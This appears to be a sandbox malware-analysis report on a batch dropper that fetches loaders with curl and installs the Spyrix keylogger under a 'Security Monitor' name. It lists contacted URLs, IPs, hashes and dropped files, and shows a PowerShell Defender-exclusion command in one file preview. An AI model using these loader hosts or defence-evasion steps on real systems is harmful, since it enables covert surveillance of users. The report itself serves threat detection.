http://repository.certum.pl/l3.cer0	[space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	false
https://api.dropbox.com/1/fileops/create_folder	spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false
http://html4/loose.dtd	qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	false
http://www.founder.com.cn/cn/bThe	[space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	false
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	[space]= .exe, 00000012.00000000.2048720751.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	false
https://spyrix.net/dashboard/prg-actionsv	spkl.exe, 00000035.00000003.2871385145.0000000001925000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp	false
https://spyrix.net/dashboard/prg-actionsuu/	qrl.exe, 0000004A.00000002.2768430811.000000000155C000.00000004.00000020.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfkf	regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp	false
http://neftali.clubdelphi.com/	spkl.exe, 00000035.00000003.2555270269.00000000044E1000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2933829318.0000000000929000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 00000049.00000000.2715567872.00000000005EA000.00000002.00000001.01000000.00000018.sdmp	false
http://.css	qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	false
https://filedn.com	[space]= .exe, 00000006.00000002.1984705669.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	false
https://api.dropbox.com/1/fileops/copy?	spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false
https://spyrix.net/dashboard/prg-actionsuu7	qrl.exe, 00000045.00000002.2767714695.0000000001C5C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000003.2745075392.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfko	spkl.exe, 00000035.00000002.2961326350.00000000033B0000.00000004.00000020.00020000.00000000.sdmp	false
http://www.typography.netD	[space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfkff	regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp	false
https://dashboard.actualkeylogger.com	spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false
http://vk.com/search	spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	false
http://vk.com/searchecp	spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	false
http://www.actualkeylogger.com/buynow.html	spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDL	[space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	false
http://www.fonts.com	[space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	false
http://www.sandoll.co.kr	[space]= .exe, 00000006.00000002.1985853291.0000000006F22000.00000004.00000800.00020000.00000000.sdmp	false
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404k	curl.exe, 00000005.00000002.1700541419.000001295C1A8000.00000004.00000020.00020000.00000000.sdmp	false
http://.jpg	qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	false
https://api.dropbox.com/1/fileops/move	spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false
https://swtb-download.spy	[space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe7	[space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	false
http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU	spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	false
https://spyrix.net/dashboard/prg-actionsers	qrl.exe, 00000047.00000002.2757133303.0000000001450000.00000004.00000020.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe.	[space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	false
https://cdnbaynet.com/loader/link.php?prg_id=sfkX0	curl.exe, 0000000C.00000002.1788647034.00000000032C9000.00000004.00000020.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe4	wscript.exe, 00000036.00000002.2553718613.0000000003448000.00000004.00000020.00020000.00000000.sdmp	false
https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe	curl.exe, 00000005.00000003.1699852631.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1699926974.000001295C1C3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700101956.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700234054.000001295C21F000.00000004.00000020.00020000.00000000.sdmp	false
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeF	curl.exe, 0000000D.00000002.2046191187.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
167.114.14.168	swtb-download.spyrix-sfk.com	Canada	16276	OVHFR	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
158.69.117.119	spyrix.net	Canada	16276	OVHFR	false
167.114.14.170	cdnbaynet.com	Canada	16276	OVHFR	false
95.181.182.182	cl-e0469d03.edgecdn.ru	Russian Federation	200557	REGION40RU	false
23.109.93.100	filedn.com	Netherlands	7979	SERVERS-COMUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523865
Start date and time:	2024-10-02 06:09:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	90
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c5WMpr1cOc.bat renamed because original name is a hash value
Original Sample Name:	201ba880456a79f7af54cb4aa5e9c008d8a1961e686acbac7b2f1343e697b7a9.bat
Detection:	MAL
Classification:	mal100.troj.evad.winBAT@190/1078@15/9
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 199.232.214.172, 192.229.221.95, 142.250.184.227, 142.250.186.78, 74.125.133.84, 34.104.35.123, 142.250.184.232, 142.250.185.72, 142.250.186.106, 172.217.18.106, 142.250.186.42, 142.250.186.74, 172.217.16.202, 172.217.23.106, 142.250.186.170, 172.217.16.138, 142.250.185.74, 172.217.18.10, 142.250.185.106, 142.250.185.170, 216.58.206.74, 216.58.206.42, 142.250.185.138, 142.250.186.138
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, www.googletagmanager.com, e16604.g.akamaiedge.net, clients.l.google.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target qrl.exe, PID 7588 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:09:55	API Interceptor	149x Sleep call for process: powershell.exe modified
00:10:00	API Interceptor	2x Sleep call for process: svchost.exe modified
00:10:23	API Interceptor	17x Sleep call for process: [space]= .exe modified
00:10:38	API Interceptor	2x Sleep call for process: WMIC.exe modified
00:11:27	API Interceptor	1x Sleep call for process: spkl.exe modified

LLM Input / Output

Input	Output
URL: https://dashboard.spyrix.com/login Model: jbxai	{ "brand":[], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Login", "text_input_field_labels":["Email", "Password"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://dashboard.spyrix.com/login Model: jbxai	{ "phishing_score":null, "brands":"unknown", "legit_domain":null, "classification":null, "reasons":null, "brand_matches":[], "url_match":false}

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073129995814268
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrT:KooCEYhgYEL0In
MD5:	25426B7AE30C92B53D9A93B57A4854FD
SHA1:	B9F0393166FEF77BA6F5F9BE5C084F6625E4B61B
SHA-256:	4D45E25BD22C2BF8969A9E47B79263E10A0278124C6A6225BB36D5A78F369507
SHA-512:	FBF74FD1E8F50394317C240622A367E50513A39CBA925DEE2D33DAC244DC12BE3F4C380C1AA8D7CBE607C7BADAB70754B52E6DDE9C8CFD3B15F85C3B703D9649
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	457728
Entropy (8bit):	6.59955980299879
Encrypted:	false
SSDEEP:	12288:oYP3U+DowYPZOobyfwOgM2evuRTQ8r5e:3knwGZO4ZBevgTQ
MD5:	5E952525D9379E001F1714DE9E87B50D
SHA1:	45A1F15E62D3BEBF80BFDE69B992448DA09369FA
SHA-256:	81DE9F4EE9164358163C7F2200522E5C518D649ED6868CC6F27DB2B831F42DA4
SHA-512:	FCCEFD5CEFA59AAE1CCF1DF61907720BFB753AA1A6094DCB9225BA0110172103980C77708B9BB36F9D329B890ECC3F279AEE325A780308E9AC127EDC99CF8D0D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 3%, Browse
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..................................... ....@..............................................................................(...0...L.......................e......................................................\............................text............................... ..`.itext.............................. ..`.data...T.... ......................@....bss.....5...@...........................idata...(.........................@....edata...............H..............@..@.reloc...e.......f...J..............@..B.rsrc....L...0...L..................@..@....................................@..@........................................................................................................................................

Process:	C:\Windows\SysWOW64\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	2086
Entropy (8bit):	3.740968047893247
Encrypted:	false
SSDEEP:	48:tKleUhKVfcfSOMokHSOMSdiianNHMSOMadjHMSOMadvAcdqcTc20rIO:Sh0UKTy3iaNJCjJCvzdNoNIO
MD5:	0100BB15F2EF75995FD0CA6EAECBC3CF
SHA1:	CC7AFA9E26000A5A07B085974B4AB8C446C681B2
SHA-256:	EA02FF6D26D0619B9183D45023A613F2DE0ECE79448FABF4528DC9F4305B8DC3
SHA-512:	87496C13FAFEE7AC85519C01C1BB0C721842C21091A917295335D3A67281C9F265D5915F8CCD4EF1AC31635D2EFC50A2DED136B96642B61494A8DE9CA2805304
Malicious:	true
Reputation:	unknown
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.U.n.i.n.s.t.a.l.l.\.S.p.y.r.i.x. .F.r.e.e. .K.e.y.l.o.g.g.e.r._.i.s.1.].....".I.n.n.o. .S.e.t.u.p.:. .S.e.t.u.p. .V.e.r.s.i.o.n.".=.".5...5...9. .(.u.).".....".I.n.n.o. .S.e.t.u.p.:. .A.p.p. .P.a.t.h.".=.".C.:.\.\.P.r.o.g.r.a.m.D.a.t.a.\.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.".....".I.n.s.t.a.l.l.L.o.c.a.t.i.o.n.".=.".C.:.\.\.P.r.o.g.r.a.m.D.a.t.a.\.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.\.\.".....".I.n.n.o. .S.e.t.u.p.:. .I.c.o.n. .G.r.o.u.p.".=.".S.p.y.r.i.x. .F.r.e.e. .K.e.y.l.o.g.g.e.r.".....".I.n.n.o. .S.e.t.u.p.:. .U.s.e.r.".=.".j.o.n.e.s.".....".I.n.n.o. .S.e.t.u.p.:. .L.a.n.g.u.a.g.e.".=.".e.n.g.l.i.s.h.".....".D.i.s.p.l.a.y.N.

Process:	C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	7.725524916177281
Encrypted:	false
SSDEEP:	1536:Fmb6bAx1Aw+M+JqPSMr49ucL+91yhgwCqnkLrcIN6mE:Fm+b/zqPSMr49uiSUf
MD5:	D15DAEF371B50FB739401BFDE29DF35A
SHA1:	D916C598AFF72AAF461A5427CD7C6440C199FF24
SHA-256:	EE8A52DEDDF45BAC9CAA60205F83488EE644FFD1EA01998774D68C7F46568B71
SHA-512:	4145F4A52D7098B5543EFEFDBF2810B403BA82036F2EF254F458D0084DA839636F9D4DC5EC3016065FDFCCF6468DA301C4DA523ECE1244FD23EFB1FD288D5529
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W->..........."...0..P.........."n... ........@.. ....................................`..................................m..O....................................m............................................... ............... ..H............text...(N... ...P.................. ..`.rsrc................R..............@..@.reloc...............^..............@..B.................n......H...........)...........T..............................................v.(.....(..........(...........s....}.....{...........s....o.....{....o.....~....}.....0..E.......s%......}......}....~....(......~.......&...s.....o......{....(......{.....o.....{......(....r...p(....o.....l#......X@6..(....z.,..{....,..{....o......(........0..}........s ...}.....s!...}.....s"...}.....s"...}.....s"...}.....{....o#....($.....(%.....(&.....('....{....(!...o(....{......s)...o....{...

Process:	C:\Windows\System32\reg.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	236
Entropy (8bit):	3.6440699182134826
Encrypted:	false
SSDEEP:	6:Qyk+SkWCiiCRroZ6IJlUAG+DZKHWn+SkUkDkqOEcRKw:Qy5hVZteAxDZaW+oVd3
MD5:	0A7F333C72BA23F66948D2F7ACAF391E
SHA1:	4E232F923162508127336631C7A734982795FC6F
SHA-256:	C0E694FE96F168B2E1C2C6710E2DA625849F72A5260AC6F8AFD7B399B82C7026
SHA-512:	E770D89B07783F9EDBD8F13D0D369CB3CF59BD666BDEA34276EB29FB8334A413A3F8159C9FD235CF9710937EE29838AA0665EC4CDC3B03204AE353B2EF1F2A91
Malicious:	false
Reputation:	unknown
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.P.a.t.h.s.].........

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	33441448
Entropy (8bit):	7.998895110211762
Encrypted:	true
SSDEEP:	786432:sEKNHXUy8paSpU5Nqs6QWYTYAUgde09g6i53G+wSl:NE3ULMSkQs6vXBPzRG+wg
MD5:	0F335D8996D82DA30FE9286C671FA0CD
SHA1:	FF64FF5AB0FF7C848809D5A82B2F6248B38F8FA5
SHA-256:	10DED982BDF7EF7F33FD417C7D818D131B7C73CBF6E955BBE04FBA656B37FED7
SHA-512:	12BD786BB93856D09826AB5D612FB3213CF8F6EC0C0240C27A0CDC510D56F4F4089636736D1A168463A6AC824E7B2ACE2611E6A5E8E0138C490B534662B54600
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W.....................p............... ....@..................................3....@......@.......................................O...........%...!...........................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc....O.......P...(..............@..@....................................@..@........................................................................................................................................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.095795255000934
Encrypted:	false
SSDEEP:	3:nWDn:nWD
MD5:	285130BE63E78277DF11A9108B363925
SHA1:	92DD2F701821CACA090F8058BD054E840FFF88CC
SHA-256:	CFAEB467D2A24A24D97D2E8267E68E6D7C6C805D928DA760D6706AA20608FF5F
SHA-512:	30755D1EC6BEF8B943100F321489ABBE09306817099623DE7916EC2F1CB9CCD191EBD8939352DAC6207AEB95963A30690452037C808FC165DB12C54099377BAC
Malicious:	false
Reputation:	unknown
Preview:	sfkstart ..

Process:	C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1286144
Entropy (8bit):	6.249712908749164
Encrypted:	false
SSDEEP:	24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt54DTx9Ke:8qTytRFk6ek14h5
MD5:	BFA3F09DEEE00832D000F497EC5B570A
SHA1:	9D4ED9BB876E66258392AA51C9B1C0F67D38A6AE
SHA-256:	F01CFA202969C9FE931CB95E47FF59700F9EB924014ED349E0A731B3B7327518
SHA-512:	A89043F52655EB0E189A5A1F5D72BF049A855D1795D0FA0E66EA949FC6F20A5336154D4A3FC2F3480E132751963C6AF2A68806623EF0651D8CC513BE7E1DCE70
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@..........................p............@......@..............................@8...0...2................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc....2...0...4...l..............@..@....................................@..@........................................................................................................................................

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	917
Entropy (8bit):	4.884815574267147
Encrypted:	false
SSDEEP:	24:nt0vG74xdl/ko+3bdhXUnt0oxdl/ko+3bdhXUn:nt2H+3EntTH+3En
MD5:	6F2313763C1AD9F789FF3A343AD82AA1
SHA1:	8FD79A4E381A7BC0ABBCCF8DE00BA25655CCB029
SHA-256:	39EBF0A3E52E0D2EF8627338D9605F77A2D46B5B324B1E3CAB19CB6DDB43B4AB
SHA-512:	CE53871C80BFC858678553EBA88AC3B79A565F4C3F401ECA9EEB2B37CF0F3FC3CB12ED300B0B31EBAB968E79A0D40785B6CF38F9D4D687677D8CA88E0A2049E2
Malicious:	false
Reputation:	unknown
Preview:	add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'.+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'.+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
Category:	downloaded
Size (bytes):	7285
Entropy (8bit):	7.964038684015041
Encrypted:	false
SSDEEP:	192:TvxMGwo9hFNrNNXizl2Bcj94aps9y5aW2CHkz92mDXnjrVo75OKc:7aboh57AL94ly592CmFXidJc
MD5:	F687E94F4D455BA119D2187B14A884AE
SHA1:	5206BDA3E1959F6A7369D33171F9AF76F92C21E2
SHA-256:	5D18275C9AC22E917CEA324C250F54D9F6A1899BAB0EFBDF3739A6AB181BE5A3
SHA-512:	1EA801D2E9BD5C4A3FAD19776270D971A159B28B52AF0369D208D6FFC0A5F81BF0CD8B8CA2379B1C75E366694DBE4B1ED1C7CBB78137F61829A8AC38B54D93CA
Malicious:	false
Reputation:	unknown
URL:	https://cdn.cdndownload.net/dashboard30/assets/en-08b2a987.js
